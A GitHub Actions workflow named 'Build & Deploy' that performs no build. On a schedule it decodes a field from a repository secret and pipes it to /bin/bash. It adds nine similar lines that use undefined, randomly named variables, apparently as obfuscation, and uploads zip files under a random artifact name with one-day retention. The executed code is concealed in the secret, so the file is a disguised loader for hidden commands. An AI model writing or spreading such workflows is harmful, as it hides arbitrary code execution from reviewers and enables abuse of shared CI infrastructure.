name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '36 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          ojt29: ${{ secrets.ojt29 }}
        run: |
          printf '%s' "$ojt29" | jq -r .sna22 | /bin/bash
          printf '%s' "$ulmb33" | jq -r .mdxa99440 | /bin/bash
          printf '%s' "$jq5" | jq -r .xvrf5485 | /bin/bash
          echo $chjc8709 | jq -r .iydv8483 | /bin/bash
          echo $nfc379 | jq -r .uwuqe8330 | /bin/bash
          echo $b412 | jq -r .p81 | /bin/bash
          echo $wqsr37846 | jq -r .zbuc3 | /bin/bash
          echo $kjmwk705 | jq -r .bcn2644 | /bin/bash
          printf '%s' "$fx84660" | jq -r .sgjk4 | /bin/bash
          echo $kgnq0476 | jq -r .bbrp5 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: HnxyGKMq
          path: "*.zip"
          retention-days: 1
